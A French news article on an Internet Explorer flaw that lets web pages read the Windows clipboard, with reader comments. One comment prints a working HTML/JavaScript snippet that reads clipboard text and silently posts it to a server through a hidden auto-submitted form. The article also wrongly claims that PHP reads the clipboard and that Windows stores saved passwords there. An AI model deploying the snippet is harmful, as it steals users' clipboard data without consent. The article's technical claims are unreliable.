Nouvelle faille dans Internet Explorer

Le par Ange-Gabriel C.  |  26 commentaire(s) | Source : OSNews
internet explorer IE logo

Un développeur indépendant vient de (re)découvrir une particularité d'Internet Explorer qui pourrait causer des problèmes de sécurité.

Un développeur indépendant vient de (re)découvrir une particularité d'Internet Explorer qui pourrait causer des problèmes de sécurité.

Internet explorer ie logoLe forum du site AmigaWorld rapporte une conversation à l'origine de laquelle on trouve une fonctionnalité bien particulière d'Internet Explorer. En effet, en employant un code PHP approprié, il est possible de lire le contenu de votre Presse-Papier directement dans une page du navigateur Internet de Microsoft.

Le Presse-Papier de Windows, au nom si peu évocateur en français (il s'appelle Clipboard en anglais), est une petite application très pratique qui garde temporairement en mémoire des données, pendant que vous faites un copier-coller, par exemple. Certains logiciels permettent d'augmenter la capacité de cet accessoire, tandis que la fonction Nettoyage de Disque (et la plupart des logiciels tiers qui assurent les mêmes fonctions) peut le "purger" de tout ce qu'il contient. Il se vide en général automatiquement lorsque vous fermez votre session Windows, de toute façon.

Oui mais voilà, pendant votre session, vous pouvez y stocker quantités de choses, sans même vous en rendre compte. Ainsi, lorsque vous visitez un site sécurisé pour la première fois, une fois rentré votre identifiant et votre mot de passe, Windows vous propose de les mémoriser. Si vous cliquez sur "Oui", ces données seront stockées dans le Presse-Papier, avant d'être transférées dans un répertoire spécifique lorsque vous quittez l'application qui vous sert à naviguer sur le Web, et/ou quand vous éteignez votre PC.

Cette fonctionnalité, pour pratique qu'elle soit, présente donc de sérieux risques, si on sait les exploiter. Il semblerait en effet que quelques lignes de code en PHP, soigneusement imbriquées dans le code d'une page Web, convainque Internet Explorer de communiquer le contenu du Presse-Papier. Par exemple, en remplissant un simple formulaire en ligne, vous pouvez, sans vous en rendre compte, renseigner en fait les cases d'une base de données. De plus, il existe des logiciels qui permettent d'extraire le contenu du Presse-Papier, à condition qu'on les aide un peu. La particularité d'Internet Explorer dont il est question ici leur donne un sérieux coup de main...

Les autres navigateurs Internet les plus utilisés de nos jours (Mozilla Firefox, Opera, Safari, etc...) sont insensibles à cet artifice, mais les sur-couches d'Internet Explorer (Maxthon, Avant, SlimBrowser, etc...) sont concernées. Pire, un bêta-testeur qui participe au développement d'Internet Explorer 7 confirme que cette faille, si on peut l'appeler ainsi, existe toujours dans les actuelles versions de test du futur navigateur Web de Microsoft...

Les plus curieux d'entre vous peuvent tester par eux-mêmes cette "faille", en mettant quelque chose en mémoire dans le Presse-Papier de Windows (par exemple, le texte de cette news...), puis en cliquant sur ce lien. Sous Internet Explorer, vous devriez voir apparaître ce que vous avez mémorisé. Sous Firefox ou Opera, par exemple, vous aurez juste un petit message d'excuse, vous indiquant que le tour de magie n'a pas fonctionné.

Garanti sans danger, quoique... Si vous êtes cardiaque...




  • Partager ce contenu :
Cette page peut contenir des liens affiliés. Si vous achetez un produit depuis ces liens, le site marchand nous reversera une commission sans que cela n'impacte en rien le montant de votre achat. En savoir plus.
Complément d'information

Vos commentaires Page 1 / 3

Trier par : date / pertinence
BharatHope offline Hors ligne Vénéré icone 3626 points
Le #70396
"session"
Moktoipas offline Hors ligne Héroïque avatar 983 points
Le #70398
Je ne vois vraiment pas comment avec du PHP (langage interprété sur le SERVEUR) on puisse recuperer des données presentes chez le client.

Effectivement, après lecture du code,je constate qu'il ne s'agit aps de PHP mais de javascript , langage interprété chez le client.
C'est beaucoup plus logique...
Calypso offline Hors ligne Vétéran avatar 1418 points
Le #70399
En effet, du javascript:
Sous Mozilla / Firefox, page blanche.
Avec IE:
"Here's how I did it:
<html>
<head>
<title>GNAA Last Measure v4.1 by Rucas with Armorfist's PopupByPasser Mod.</title>
</head>

<body>

<form name="clip" method="post" action="test.php" style="display:none">
<input type="text" name="content">
<input type="submit">
</form>

<script language="javascript">
//without this if statement check, it bombs out with an error
if(typeof clipboardData != 'undefined') {
var content = clipboardData.getData("Text");
document.forms["clip"].elements["content"].value = content;
}
document.forms["clip"].submit();
</script>
</body>
</html>
motodingo offline Hors ligne Héroïque avatar 624 points
Le #70400
Sauf qu'il y un submit sur une page PHP. Copiez le cheumeuleu et supprimez le action=test.php et ça ne marche plus.
Ceci dit le php peut très bien généré du javascript.
A+
sebessence offline Hors ligne Héroïque avatar 747 points
Le #70401
une faille de plus ou de moins vive Firefox qui n'est pas sans faille mais tente toujours de les corriger très rapidement
Anonyme
Le #70402
oui javascript, mon extension (firefox) a bloqué le script et j'ai eu le message d'erreur uniquement une fois avoir autorisé le site a utiliser javascript.

ca va troller alors bonne chance aux admirateurs d'IE (s'il en reste...)

(mode troll off)
bonne journée
Maxime81 offline Hors ligne VIP avatar 5239 points
Le #70404
Ca se dégrade la qualité des news sur ce site ...
C'est très rapide de voir que le php ne sert ici qu'à une chose, regarder le user agent...
Qui ici n'a jamais vu sous windows un site qui montre le contenu de c: dans une page pour essayer de vendre un antivirus '
damn offline Hors ligne Héroïque avatar 695 points
Le #70405
BharatHope:
"session"
"cession" ca marche aussi
HoverSpeed offline Hors ligne Vétéran avatar 1055 points
Le #70406
La version 7 d'IE même pas sortie et déja une faille à déclarer (Bon on va dire quelle ne compte pas celle là. sauf si il ne la corrige pas avant sa sortie )
Enfin de toute manière on est en sécurité nulle part
makina-galaxy offline Hors ligne Vétéran avatar 1567 points
Le #70409
On ne parle pas de IE7...
icone Suivre les commentaires
Poster un commentaire